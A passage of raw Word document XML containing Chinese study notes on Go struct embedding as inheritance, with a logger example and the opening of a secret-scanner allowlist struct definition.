      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>如果没有指针</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则不会改变对象中的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040C768A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2C406E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>基本语法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B0B3EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:t>基类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F3373A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>type Base struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9AABBF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:t>成员变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BBAC02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C298AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7567F76A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">func (b *Base) </w:t>
      </w:r>
      <w:r>
        <w:t>函数名</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>参数列表</w:t>
      </w:r>
      <w:r>
        <w:t>) (</w:t>
      </w:r>
      <w:r>
        <w:t>返回值列表</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308BA428" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:t>函数体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782555BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B57313D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B08DB7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:t>派生类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD8F438" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>type Derived struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171DEFF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728BDEF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:t>成员变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF4F2A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220E03E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB88BEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">func (b *Derived) </w:t>
      </w:r>
      <w:r>
        <w:t>函数名</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>参数列表</w:t>
      </w:r>
      <w:r>
        <w:t>) (</w:t>
      </w:r>
      <w:r>
        <w:t>返回值列表</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DC3F10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:t>函数体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C255A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E1ADB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D0F10F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>继承规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>：嵌套式继承，可直接访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BCA82A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在派生类没有改写基类的成员方法时，相应的成员方法被继承。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8C1353" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>派生类可以直接调用基类的成员方法，譬如基类有个成员方法为</w:t>
      </w:r>
      <w:r>
        <w:t>Base.Func()</w:t>
      </w:r>
      <w:r>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:t>Derived.Func()</w:t>
      </w:r>
      <w:r>
        <w:t>等同于</w:t>
      </w:r>
      <w:r>
        <w:t>Derived.Base.Func()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CE163E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A38201D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>继承规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>：嵌套式继承，覆盖原则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0634DF57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>倘若派生类的成员方法名与基类的成员方法名相同，那么基类方法将被覆盖或叫隐藏，譬如基类和派生类都有成员方法</w:t>
      </w:r>
      <w:r>
        <w:t>Func()</w:t>
      </w:r>
      <w:r>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:t>Derived.Func()</w:t>
      </w:r>
      <w:r>
        <w:t>将只能调用派生类的</w:t>
      </w:r>
      <w:r>
        <w:t>Func()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，如果要调用基类版本，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>Derived.Base.Func()</w:t>
      </w:r>
      <w:r>
        <w:t>来调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3568C82D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD42956" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>指针方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59428A8D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>基类采用指针方式的组合，依然具有派生的效果，只是派生类创建实例的时候需要外部提供一个基类实例的指针。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CA39E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>其他规则与非指针方式组合一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311C6EB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ACF6E58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C8EAFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EB5DD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B3BCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1DA47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F8F1D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "os"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF22F28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6507C4A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760F500B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>type MyJob struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447EA3FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Command string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496613A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>*log.Logger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BBE7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19978154" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644924BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func (job *MyJob) Start() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651373D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    job.Println("job started!") // job.Logger.Println</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364F4796" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7A087B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fmt.Println(job.Command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A418FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705FBEF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    job.Println("job finished!") // job.Logger.Println</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242DB26B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08227EA1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E608C1B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBA254" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    logFile, err := os.OpenFile("./job.log", os.O_RDWR|os.O_CREATE|os.O_APPEND, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BF450A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC83FE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        fmt.Println("%s", err.Error())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348BF15" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D788FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAEE4DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    defer logFile.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438EF0C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB75A0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> logger := log.New(logFile, "[info]", log.Ldate|log.Ltime|log.Llongfile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E06B688" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> job := MyJob{"programming", logger}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42956B61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79453842" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    job.Start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C3BE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    job.Println("test finished!") // job.Logger.Println</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E202F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0698FB61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F06186" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DA2EBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3FF96E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5350B299" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type Allowlist struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E075EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>// Short human readable description of the allowlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13188626" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Description string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDF281D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42129EE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Regexes is slice of content regular expressions that are allowed to be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F65D602" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Regexes []*regexp.Regexp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CFF460" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24DEE510" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Paths is a slice of path regular expressions that are allowed to be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160656A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Paths []*regexp.Regexp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C371538" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3835C2F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Commits is a slice of commit SHAs that are allowed to be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01843082" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Commits []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47458AFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F23313" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// StopWords is a slice of stop words that are allowed to be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E4E6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// This targets the _secret_, not the content of the regex match like the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B335C00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Regexes slice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5D52E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
